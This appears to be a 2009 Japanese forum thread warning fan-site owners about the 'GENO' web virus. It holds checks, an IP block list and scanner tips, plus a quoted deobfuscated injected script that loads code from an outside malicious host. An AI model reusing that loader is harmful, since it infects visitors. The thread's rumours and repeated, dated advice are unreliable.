【管理も】同人サイト・GENOウィルス注意4【閲覧も】
新種のコンピュータウィルスが流行っています。
感染サイトを踏んだだけで発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。
現時点で大半のセキュリティソフトをくぐり抜けてしまうため、
とりあえずジャンル関係なく、全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
・確認点
【sqlsodbc.chmが改ざんされていないかを確認】
Windows XP: 改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
Windows 2000: そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
【cmd.exe、regedit.exeが立ち上がるかどうか】
このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
前スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
感染サイトを踏んだだけで発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。
現時点で大半のセキュリティソフトをくぐり抜けてしまうため、
とりあえずジャンル関係なく、全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
・確認点
【sqlsodbc.chmが改ざんされていないかを確認】
Windows XP: 改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
Windows 2000: そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
【cmd.exe、regedit.exeが立ち上がるかどうか】
このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
前スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
|
|
|
当スレでは感染報告については、注意喚起の観点から
・感染が認められたジャンル名
のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。
晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。
・感染が認められたジャンル名
のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。
晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/
次スレは>>900が立ててください
立てられないなら立てられないで極力早めに報告してください
http://www31.atwiki.jp/doujin_vinfo/
次スレは>>900が立ててください
立てられないなら立てられないで極力早めに報告してください
日経セキュリティ・ホール&ウイルス「JSRedir-R」
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
6 :GENO感染報告ありジャンル一覧:2009/05/16(土) 23:43:22 ID:Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなど閲覧者多数サイト感染による被害の爆発的拡大が予測される場合、特に()内に記載。
■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン
ガンダム:SEED、00 / ポケモン / ハルヒ
■少年漫画【週刊少年ジャンプ系】
リボーン(オンリー+プチオンリー告知サイト・ファンサイト) / ジョジョの奇妙な冒険+スティールボールラン/ ワンピース / テニスの王子様
デスノート / D.Gray-man / 遊戯王無印+GX+5D's / 銀魂 /
■少年漫画【Gファンタジーなど少年ガンガン系、小学館、その他】
鋼の錬金術師(オンリー告知サイト) / 隠の王 / 黒執事 / パンドラハーツ / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟) / おお振り(アンソロ告知サイト) / 福本:越境、銀金
■ゲーム【RPG、SRPG、ACT】
幻想水滸伝 / テイルズオブ:ジアビス / STAR OCEANシリーズ / INFINITE UNDISCOVERY / メガテン:真、サマナー、ライドウ、P4 /
戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン / ゼルダの伝説 /
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼 / 金色のコルダ /
ニトロプラスキラル:咎狗(アンソロ告知サイト)、sweet pool / 鬼畜眼鏡 /
Fate / ひぐらし
■ゲーム【アーケード、シューティング、格闘、シュミレーション※SRPG除、その他】
ポップンミュージック / ビートマニアUDX / 東方 (超大手感染情報) / ブレイブルー / 牧場物語 / 逆転裁判 /
■小説・ライトノベル - 小野不由美(サーチ) / ハルヒ
■創作 - 創作小説 / 男性向け創作同人ゲーム / 女性向け創作同人ゲーム / オリJUNE
■特撮 - 仮○ライ○ー:電王、剣、
■生モノ - ジャニーズ:K○T-TUN、N○WS / テニミュ(ファンサイト) /
■その他・音源系 - ボーカロイド(サーチ) / Sound Horizon /
■他の接触確率の高そうな報告例 - 非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト
■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン
ガンダム:SEED、00 / ポケモン / ハルヒ
■少年漫画【週刊少年ジャンプ系】
リボーン(オンリー+プチオンリー告知サイト・ファンサイト) / ジョジョの奇妙な冒険+スティールボールラン/ ワンピース / テニスの王子様
デスノート / D.Gray-man / 遊戯王無印+GX+5D's / 銀魂 /
■少年漫画【Gファンタジーなど少年ガンガン系、小学館、その他】
鋼の錬金術師(オンリー告知サイト) / 隠の王 / 黒執事 / パンドラハーツ / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟) / おお振り(アンソロ告知サイト) / 福本:越境、銀金
■ゲーム【RPG、SRPG、ACT】
幻想水滸伝 / テイルズオブ:ジアビス / STAR OCEANシリーズ / INFINITE UNDISCOVERY / メガテン:真、サマナー、ライドウ、P4 /
戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン / ゼルダの伝説 /
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼 / 金色のコルダ /
ニトロプラスキラル:咎狗(アンソロ告知サイト)、sweet pool / 鬼畜眼鏡 /
Fate / ひぐらし
■ゲーム【アーケード、シューティング、格闘、シュミレーション※SRPG除、その他】
ポップンミュージック / ビートマニアUDX / 東方 (超大手感染情報) / ブレイブルー / 牧場物語 / 逆転裁判 /
■小説・ライトノベル - 小野不由美(サーチ) / ハルヒ
■創作 - 創作小説 / 男性向け創作同人ゲーム / 女性向け創作同人ゲーム / オリJUNE
■特撮 - 仮○ライ○ー:電王、剣、
■生モノ - ジャニーズ:K○T-TUN、N○WS / テニミュ(ファンサイト) /
■その他・音源系 - ボーカロイド(サーチ) / Sound Horizon /
■他の接触確率の高そうな報告例 - 非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト
7 :GENO:2009/05/16(土) 23:43:55 ID:yglYJEG80
アクティブスクリプトは切らなくても大丈夫だよね?
9 :GENO:2009/05/16(土) 23:45:54 ID:ku3DnmWq0
これがテンプレ1じゃないの?>>1
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
そのサイトを見た人を感染させます。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
そのサイトを見た人を感染させます。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
自ジャンルの行きつけサイトが感染してるか調べたいんだけど、
サイトが感染してるか調べられるチェッカーのアドレスを教えてもらえないでしょうか
サイト ウィルス 感染 チェッカー などで検索したけど見つからず。
サイトが感染してるか調べられるチェッカーのアドレスを教えてもらえないでしょうか
サイト ウィルス 感染 チェッカー などで検索したけど見つからず。
こちらでもまとめwiki管理人さんへのレスは>>3でいいのかな?
>600 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:40:25
>var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
>
>if(
> (u.indexOf("Chrome")<0)&&
> (u.indexOf("Win")>0)&&
> (u.indexOf("NT 6")<0)&&
> (document.cookie.indexOf("miek=1")<0)&&
> (typeof(zrvzts)!=typeof("A"))
>){
> zrvzts="A";
> eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
> document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
>}
>
>埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
>616 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:44:55
>>>600
>これだと、ChromeとNT 6以上を除外してるだけだな。
>Firefoxも対象だ。
Firefoxでも感染の危険はあります
IE専用ではありません
>var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
>
>if(
> (u.indexOf("Chrome")<0)&&
> (u.indexOf("Win")>0)&&
> (u.indexOf("NT 6")<0)&&
> (document.cookie.indexOf("miek=1")<0)&&
> (typeof(zrvzts)!=typeof("A"))
>){
> zrvzts="A";
> eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
> document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
>}
>
>埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
>616 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:44:55
>>>600
>これだと、ChromeとNT 6以上を除外してるだけだな。
>Firefoxも対象だ。
Firefoxでも感染の危険はあります
IE専用ではありません
このサイトは既出か?
参考にしてほしい。
http://www.virustotal.com/jp/
Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
参考にしてほしい。
http://www.virustotal.com/jp/
Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
>>8
切れ
切れ
15 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:47:31 ID:bmeWatfA0
自分のサイトのソースを見れば確認できるって
もしかしてサイトの全ファイルのソースを書き換えられてしまうの?
もしかしてサイトの全ファイルのソースを書き換えられてしまうの?
FC2繋がらないな
重いだけ?
重いだけ?
18 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:48:13 ID:VY+JwH9i0
>>10
wiki見ろ
wiki見ろ
>>10
http://wepawet.cs.ucsb.edu/
ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
引用だけど
http://wepawet.cs.ucsb.edu/
ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
引用だけど
20 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:48:54 ID:TcEgRY7n0
>>16
家の場合はサイト内の8割が改変されてたよ
家の場合はサイト内の8割が改変されてたよ
BuffaloのルータでのIP遮断方法を書いておく。機種はWHR-HP-AMPG
Buffaloのほかの機種でもいけると思うから自分の環境に合わせて読んでくれ。
http://192.168.11.1/ に接続
左側のメニューから
ネットワーク設定→パケットフィルタ
右側の画面から
「IPフィルタ登録情報の編集」というボタンを押す
>>3から拒否すべきIPを全て登録する
動作:無視
方向:WAN→LAN,LAN→WANの両方
プロトコル:全て
IP:以下に記載(現時点で発見されているIP。IPの後の『/xx』も入れること。)
WAN→LANなら「送信元」、LAN→WANなら「宛先」の欄に入れること。LAN側のIPは入れなくてよい
94.229.65.160/27
94.247.2.0/23
95.129.145.58
95.129.144.0/23
78.109.29.112
以上です。正直パケットフィルタとか初めてやったので間違えてるかもしれないけど・・・
参考になったら幸いです。あと、ググッたら「すぐ破られる」と書いてあったので他の対策とあわせてやってください。
Buffaloのほかの機種でもいけると思うから自分の環境に合わせて読んでくれ。
http://192.168.11.1/ に接続
左側のメニューから
ネットワーク設定→パケットフィルタ
右側の画面から
「IPフィルタ登録情報の編集」というボタンを押す
>>3から拒否すべきIPを全て登録する
動作:無視
方向:WAN→LAN,LAN→WANの両方
プロトコル:全て
IP:以下に記載(現時点で発見されているIP。IPの後の『/xx』も入れること。)
WAN→LANなら「送信元」、LAN→WANなら「宛先」の欄に入れること。LAN側のIPは入れなくてよい
94.229.65.160/27
94.247.2.0/23
95.129.145.58
95.129.144.0/23
78.109.29.112
以上です。正直パケットフィルタとか初めてやったので間違えてるかもしれないけど・・・
参考になったら幸いです。あと、ググッたら「すぐ破られる」と書いてあったので他の対策とあわせてやってください。
>>http://changi.2ch.net/test/read.cgi/doujin/1242466997/1000
ホントそうだよな
やたらと不安がるがウイルスの感染の仕方を把握してない人もいるな
ホントそうだよな
やたらと不安がるがウイルスの感染の仕方を把握してない人もいるな
自分もFC2繋がらない。
FC2が引っ掛かったから緊急シャットアウトとかかな・・・
FC2が引っ掛かったから緊急シャットアウトとかかな・・・
FC2繋がらなくなった。
自サイトもブログも。
こんなときにやめてくれよ。
激烈に重いが、びみょーにつながったりもする。
自サイトもブログも。
こんなときにやめてくれよ。
激烈に重いが、びみょーにつながったりもする。
>20
早い回答ありがとうございます
たくさんHTMLファイルあるからどうしようかと思った
早い回答ありがとうございます
たくさんHTMLファイルあるからどうしようかと思った
fc2がつながらなくなったが
いつもみたいにただ重いだけかそれとも…
いつもみたいにただ重いだけかそれとも…
29 :GENO:2009/05/16(土) 23:49:45 ID:gHKu351l0
30 :GENO:2009/05/16(土) 23:50:16 ID:uACsvbNb0
>>前スレ960
IP遮断するのはファイアウォールの設定じゃないか?
Avast!はアンチウイルス機能だけでFWの機能は無いから、
Windows標準のか他のソフトなりで遮断する必要があると思う
IP遮断するのはファイアウォールの設定じゃないか?
Avast!はアンチウイルス機能だけでFWの機能は無いから、
Windows標準のか他のソフトなりで遮断する必要があると思う
31 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:50:33 ID:zQ8TpxQP0
FC2、この時間帯はいつも重いけど
即座に繋がりませんって出る。
こんなんは初めてだな。
即座に繋がりませんって出る。
こんなんは初めてだな。
33 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:51:17 ID:/ztF86Ry0
>>12
これってどこの板?
これってどこの板?
該当ジャンルサイトさんのブログでこのウイルスのこと注意してて、
『私のサイトは大丈夫そうでしたが』とあったから、暇つぶしに見に行こうとしたら繋がらなくて死ぬほどビビった。
fc2…こんなときに止めてくれ……ウイルスじゃないよな?即cmd.exe開けるか確認してしまった
『私のサイトは大丈夫そうでしたが』とあったから、暇つぶしに見に行こうとしたら繋がらなくて死ぬほどビビった。
fc2…こんなときに止めてくれ……ウイルスじゃないよな?即cmd.exe開けるか確認してしまった
みんな同じ事をするからな
ほんの数分前には普通に繋がったんだ。
うち、日記がfc2で、書き込んだばっかり。
編集しようとしたらもう繋がらなかった
うち、日記がfc2で、書き込んだばっかり。
編集しようとしたらもう繋がらなかった
>>31
じゃあ見なくていいよ
じゃあ見なくていいよ
39 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:52:32 ID:zIOGeaSK0
問題のサイトをぐーぐる先生でみるだけで
avestタソが怒るんだが・・・
avestタソが怒るんだが・・・
fc2全滅じゃね
まさか…
まさか…
>>1乙
IEでフラッシュプレーヤーの更新出来ねえファックファック
IEでフラッシュプレーヤーの更新出来ねえファックファック
FC2はいつものことじゃねーの?
凄い勢いでスクリプト書き換えてるみたいだね>ウィルス
火狐陥落も時間の問題かも…
火狐陥落も時間の問題かも…
45 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:53:22 ID:NG0XsJSj0
>>12
chrome最強伝説!?
chrome最強伝説!?
>>41
ありがとう。見てくる
ありがとう。見てくる
47 :GENO:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ
前スレで
>あとFlashはブラウザごとに更新がひつようだからな。
>IEでFlashを最新にしても火狐のFlashは最新にならない。
>別におこなうのが必要。
って書いてあったけど、さっきFirefox自体をインストールしたばっかりの場合は、
Firefox用のFlashはそもそも入ってないって状態のこと?ならこのままFlash入れない方がいいの?
それとも一番古いFlashが入ってるとかで、更新しないと危ない?
>あとFlashはブラウザごとに更新がひつようだからな。
>IEでFlashを最新にしても火狐のFlashは最新にならない。
>別におこなうのが必要。
って書いてあったけど、さっきFirefox自体をインストールしたばっかりの場合は、
Firefox用のFlashはそもそも入ってないって状態のこと?ならこのままFlash入れない方がいいの?
それとも一番古いFlashが入ってるとかで、更新しないと危ない?
fc2ブログ37鯖74鯖78鯖即座に404
50 :GENO:2009/05/16(土) 23:54:20 ID:ULswC4HQ0
こっちもつながらん。FC2もか?
fc2ブログで感染してるのがあった、なかったって話があったから
運営側が一旦全部止めてチェックかけてるんじゃないの
ってことはないか
運営側が一旦全部止めてチェックかけてるんじゃないの
ってことはないか
52 :GENO:2009/05/16(土) 23:54:37 ID:mT3cvEnF0
ここでLynx最強伝説を唱えておく
>>1乙
最近活発なジャンル者なんだけど、昨日ここ見てHPに注意載せた
今日アクセスログでブラウザ情報見たらIE6が25%でIE7が50%
JS切りも全体の5%に満たないとか…
ここ見てると騒ぎすぎなのかなってくらいに見えるけど
実際対応してる人って、かなり少ないんだな…注意載せる他に何すればいいんだろ?
最近活発なジャンル者なんだけど、昨日ここ見てHPに注意載せた
今日アクセスログでブラウザ情報見たらIE6が25%でIE7が50%
JS切りも全体の5%に満たないとか…
ここ見てると騒ぎすぎなのかなってくらいに見えるけど
実際対応してる人って、かなり少ないんだな…注意載せる他に何すればいいんだろ?
54 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:54:45 ID:ZL6ac9Ee0
fc2ホームページも同様につながらなくなった
もう何がなにやら・・・
さっき見に行って自分とこは大丈夫なの確認したとこだFc2
>>23
FTPのID,パスワードは抜かれるの確定だけど、
現段階では他のID、パスワードは不明。クレカ番号も不明
ただし、警戒は怠るな
として欲しいだけなんだけどね
wikiに載せるならあまりにも不正確だと信頼なくす
FTPのID,パスワードは抜かれるの確定だけど、
現段階では他のID、パスワードは不明。クレカ番号も不明
ただし、警戒は怠るな
として欲しいだけなんだけどね
wikiに載せるならあまりにも不正確だと信頼なくす
59 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:55:21 ID:Pxeewzn20
まあFC2は少し前にも全鯖落ちとかしてたし
ほんとだfc2繋がらない。
チェック中なのかな。
チェック中なのかな。
62 :GENO:2009/05/16(土) 23:55:41 ID:QEvo2/9u0
>>47
本当か?こんな時に釣りとかやめろよ?
本当か?こんな時に釣りとかやめろよ?
>>31
ここは平気でも普通のwikiは感染ページにリンク張られたりするから注意
ここは平気でも普通のwikiは感染ページにリンク張られたりするから注意
>>49
その37鯖74鯖とかって?
その37鯖74鯖とかって?
66 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:55:54 ID:NG0XsJSj0
4亀感染とかマジかよ…
68 :GENO:2009/05/16(土) 23:56:09 ID:da7uuXa20
Vistaは感染しないの?
>>33
セキュリティ板のGENOスレかと
セキュリティ板のGENOスレかと
>>47
4gamerとファミ通が感染!!?
4gamerとファミ通が感染!!?
74 :GENO:2009/05/16(土) 23:56:56 ID:8lxpStGl0
75 :GENO:2009/05/16(土) 23:56:57 ID:uT/VnXVX0
やべええええええええええええええ
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558
ヨミサーチを設置後、htmlソースがおかしくなりました。
<script language=javascript><!--
(function(t){eval(unescape(('.76ar.20a.
ベストアンサーに選ばれた回答
問題ありません。
特に気にしなくても結構です。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558
ヨミサーチを設置後、htmlソースがおかしくなりました。
<script language=javascript><!--
(function(t){eval(unescape(('.76ar.20a.
ベストアンサーに選ばれた回答
問題ありません。
特に気にしなくても結構です。
76 :前スレ914:2009/05/16(土) 23:57:45 ID:2fUnOYk6O
スレの流れ早すぎw
うちもソースチェッカー始めたら、さっそくFC2のサイトさんが全滅気味
前スレ>>964
ありがとう
とりあえず自分もMacからソースチェッカー地道にやってみた
LinuxやMacまでターゲットなあしゅが出きたらもう\(^o^)/オワタ
うちもソースチェッカー始めたら、さっそくFC2のサイトさんが全滅気味
前スレ>>964
ありがとう
とりあえず自分もMacからソースチェッカー地道にやってみた
LinuxやMacまでターゲットなあしゅが出きたらもう\(^o^)/オワタ
Fc2は全鯖落ちてるが
最近定期的に鯖死亡してるからGENOとは関係ないと思われ
最近定期的に鯖死亡してるからGENOとは関係ないと思われ
とりあえず感染したら
必要なファイルは外付けに移動させれば大丈夫だよな
特定ファイルにしか感染しないし
必要なファイルは外付けに移動させれば大丈夫だよな
特定ファイルにしか感染しないし
79 :GENO:2009/05/16(土) 23:58:08 ID:JQfIRf1nO
>>47
mjd?
mjd?
もっと注意喚起した方が良いんじゃないの?
Yahooとか働けよ。
Yahooとか働けよ。
カスペルスキーラボ:ウイルスウォッチ
ttp://www.kaspersky.co.jp/viruswatchlite?search_virus=Trojan-PSW.Win32.Kates.c&x=0&y=0&hour_offset=5
Trojan-PSW.Win32.Kates.c
検知時刻
2009年5月15日 午前2時48分
更新ファイルリリース日時
2009年5月15日 午前9時07分
ttp://www.kaspersky.co.jp/viruswatchlite?search_virus=Trojan-PSW.Win32.Kates.c&x=0&y=0&hour_offset=5
Trojan-PSW.Win32.Kates.c
検知時刻
2009年5月15日 午前2時48分
更新ファイルリリース日時
2009年5月15日 午前9時07分
83 :GENO:2009/05/16(土) 23:58:57 ID:nylX4fmQ0
作ったやつこんだけ個人情報集まりすぎてどうしたらいいのか
本人もパニックになっていると推測
本人もパニックになっていると推測
JavaScript切れば、ネサフしてもおk?
87 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 23:59:15 ID:qU7y8KVc0
まぁ日ごろからメンテしてない奴の自業自得だよな
それってどこで調べてるの?
>>47
>>47
20分くらい前>>3のwiki見たら中国語?みたいな感じで化けてて
エンコード変えてみても化けてて
ウィルス感染かと思って不安になったんだけど
前スレ見てもあまり書いてないし今は化けてないみたいだし
ウィルス感染かどうかわかりますか?
エンコード変えてみても化けてて
ウィルス感染かと思って不安になったんだけど
前スレ見てもあまり書いてないし今は化けてないみたいだし
ウィルス感染かどうかわかりますか?
90 :GENO:2009/05/16(土) 23:59:43 ID:ps5/AV/I0
しかしこれ下手したらネット世界終了のお知らせ!とかなりかねなくないか
これいつになったら落ち着くんだろう…むやみに検索もネサフも出来やしない
早くおさまってくれるといいな
早くおさまってくれるといいな
93 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:00:08 ID:RBgr+byX0
>>47
それ本当ならやばくね?
それ本当ならやばくね?
>>86
これがGENOウイルス?
これがGENOウイルス?
いつだか書き込みした者だけど
「非同人系ゲーム同盟サイト」って自分が書き込みした奴だろうかね。
今日見てみたらウィルスの反応なし。avestさんも警告しなかった。
結局感染してたみたいだが、報告とかお知らせとか全く無し。
「非同人系ゲーム同盟サイト」って自分が書き込みした奴だろうかね。
今日見てみたらウィルスの反応なし。avestさんも警告しなかった。
結局感染してたみたいだが、報告とかお知らせとか全く無し。
もしもう答えが出ていたらすみません。
Windowsに元からあるセキュリティ設定の
「制限つきサイト」にもIP入れておいたほうが良いですか?
一応スクリプトなんかをブロックすると書いてあったので
気休め程度にはなるのでしょうか
Windowsに元からあるセキュリティ設定の
「制限つきサイト」にもIP入れておいたほうが良いですか?
一応スクリプトなんかをブロックすると書いてあったので
気休め程度にはなるのでしょうか
こんな時に釣りとかアホか
98 :GENO:2009/05/17(日) 00:01:15 ID:NoJwz4rA0
>47
誤報だった場合
後日損害賠償請求される事もあるから慎重に
誤報だった場合
後日損害賠償請求される事もあるから慎重に
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
ttp://www.adobe.com/jp/software/flash/about/
ダウンロード
ttp://get.adobe.com/jp/flashplayer/
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
ttp://get.adobe.com/jp/reader/
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<javascript>→<Acrobat Javascriptを使用>のチェックを外し、[OK]
バージョンの確認 最新:10.0.22.87
ttp://www.adobe.com/jp/software/flash/about/
ダウンロード
ttp://get.adobe.com/jp/flashplayer/
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
ttp://get.adobe.com/jp/reader/
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<javascript>→<Acrobat Javascriptを使用>のチェックを外し、[OK]
>>99
それくらい知ってて確信を持ってレスしたと思ってるから皆食いついたんだろ
それくらい知ってて確信を持ってレスしたと思ってるから皆食いついたんだろ
102 :geno:2009/05/17(日) 00:02:11 ID:+10WbMtBO
fc2やばいの?
ロリポとか忍者とか有名鯖はどうなの?
ロリポとか忍者とか有名鯖はどうなの?
>>3のまとめ管理人です
新スレ乙、正直流れが速すぎて必死w
ミスのないよう落ち着いて更新していこうと思うので、Wikiにかかわる情報は
>3へアンカつけてレスしてください
このレスはWikiにあったらいいな、とかいうのも、>3で
現在35まで確認、前スレの分も含めてすべて追加修正したつもりなので
各自確認・指摘をお願いします
新スレ乙、正直流れが速すぎて必死w
ミスのないよう落ち着いて更新していこうと思うので、Wikiにかかわる情報は
>3へアンカつけてレスしてください
このレスはWikiにあったらいいな、とかいうのも、>3で
現在35まで確認、前スレの分も含めてすべて追加修正したつもりなので
各自確認・指摘をお願いします
ちょっとカスペ先生で質問なんだが、オンラインスキャンはやっぱ全体じゃなきゃだめ?
いや、検索時間ながくてなぁ……。
いや、検索時間ながくてなぁ……。
>>67
まじでか!!!!?
まじでか!!!!?
とにかく自分達が楽しければ、セキュリティ対策なんてどうでもいいと思ってる奴が
腐女子に多いからこれだけ同人サイトに広まったんだろうね
感染した奴はこれを機会に100万回は反省しとけ
タダでさえ腐はいろんな場所でウザがられてるんだから
それ以外でこれ以上迷惑かけるなといいたい
腐女子に多いからこれだけ同人サイトに広まったんだろうね
感染した奴はこれを機会に100万回は反省しとけ
タダでさえ腐はいろんな場所でウザがられてるんだから
それ以外でこれ以上迷惑かけるなといいたい
カスペでスキャンできないのは何故なんだorz
前スレでセキュリティソフト重複させるとアウアウって聞いたけど、
>>30のようにavastとWindowsFirewallって重複させても大丈夫なの?
>>30のようにavastとWindowsFirewallって重複させても大丈夫なの?
>106
体験版落としてローカルで完全スキャンした方が早い。
320GBのノートPCでも40分くらいかかるけど、今回問題となっているFlash・AcrobatReaderの
旧バージョンは100%「脆弱性に問題あり」として隔離か削除を推奨してくる。
体験版落としてローカルで完全スキャンした方が早い。
320GBのノートPCでも40分くらいかかるけど、今回問題となっているFlash・AcrobatReaderの
旧バージョンは100%「脆弱性に問題あり」として隔離か削除を推奨してくる。
まとめの人乙…
fc2はID含め全面的につながらん
週末の夜だとしてもまったくだめだ
チェックしてくれてるんだといいんだけどなー
fc2はID含め全面的につながらん
週末の夜だとしてもまったくだめだ
チェックしてくれてるんだといいんだけどなー
>>110
ドサクサ紛れの腐女子叩きをしている場合じゃない
ドサクサ紛れの腐女子叩きをしている場合じゃない
>>111
javascript切ってると出来ないぞ
javascript切ってると出来ないぞ
118 :GENO:2009/05/17(日) 00:06:51 ID:mXU46OMrO
イーセットで検出出来る?
119 :GENO:2009/05/17(日) 00:07:06 ID:9u3fpjKy0
>>112
FWはセキュリティソフトとはまた違うのでは
